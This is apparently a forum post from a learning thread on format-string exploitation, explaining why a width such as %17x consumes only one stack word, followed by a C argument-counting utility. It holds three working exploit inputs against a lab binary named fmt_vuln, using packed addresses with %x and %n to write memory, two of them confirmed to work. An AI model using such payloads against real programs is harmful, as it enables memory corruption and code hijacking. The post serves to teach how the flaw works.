OH! So %17x would go down the memory only once and pad it. I knew that %x would go down the memory by 4 bytes, and it seemed obvious that %17x would thus go down by 17*4 = 68 bytes!!

The two conditions you want (below), as I said in the last post, do work. And now we know why they do.


./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n

./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n


And now we know why the following doesn't work, since the %17x makes the stack grow and hence overshoot the 2nd address.


./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n


Maestr0 has saved the day. Actually more than a day!
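As an added illustration (my own code, not from the book, the thread or the fmt_vuln program): a small counter that walks a printf-style format string and reports how many arguments it consumes, the same check a format-string linter performs to flag argument mismatches, plus a rendering over four constructed sample words showing that %17x pads to 17 columns but still consumes exactly one word. The word values 0x11111111 and so on are constructed, not real addresses.

```c
#include <stdio.h>
#include <string.h>

static const char *skip_digits(const char *p)
{
    while (*p >= '0' && *p <= '9') p++;
    return p;
}

/* Count the variadic arguments a printf-style format string consumes.
 * A numeric width such as %17x only pads the output; the conversion still
 * consumes exactly one argument (one stack word on 32-bit x86).  A '*'
 * width or precision consumes an extra int, and %% consumes nothing. */
int count_format_args(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        if (*++p == '%') continue;                 /* literal percent sign */
        while (*p && strchr("-+ #0", *p)) p++;     /* flags */
        if (*p == '*') { n++; p++; }               /* width taken from an argument */
        else p = skip_digits(p);                   /* fixed width: no argument */
        if (*p == '.') {                           /* precision, same rule */
            if (*++p == '*') { n++; p++; }
            else p = skip_digits(p);
        }
        while (*p && strchr("hlLqjzt", *p)) p++;   /* length modifiers */
        if (*p == '\0') break;                     /* dangling '%' at end of string */
        n++;                                       /* the conversion itself: x, n, s, ... */
    }
    return n;
}

/* Render "%x%x%17x%x" over four constructed words (not real addresses) so the
 * padding of %17x is visible next to the single word it consumed. */
const char *demo_width_consumes_one_word(void)
{
    static char out[64];
    unsigned words[4] = { 0x11111111u, 0x22222222u, 0x33333333u, 0x44444444u };
    snprintf(out, sizeof out, "%x%x%17x%x", words[0], words[1], words[2], words[3]);
    return out;
}

int main(void)
{
    printf("[%s]\n", demo_width_consumes_one_word());
    printf("with JUNK   : %d words\n", count_format_args("%x%x%142x%n%17x%n"));
    printf("17 literals : %d words\n", count_format_args("%x%x%146x%n12345678912345678%n"));
    return 0;
}
```

The counter reports 6 words for the JUNK variant and 5 for the literal-padding variant, which is exactly why the second address must sit one word further along in the first case.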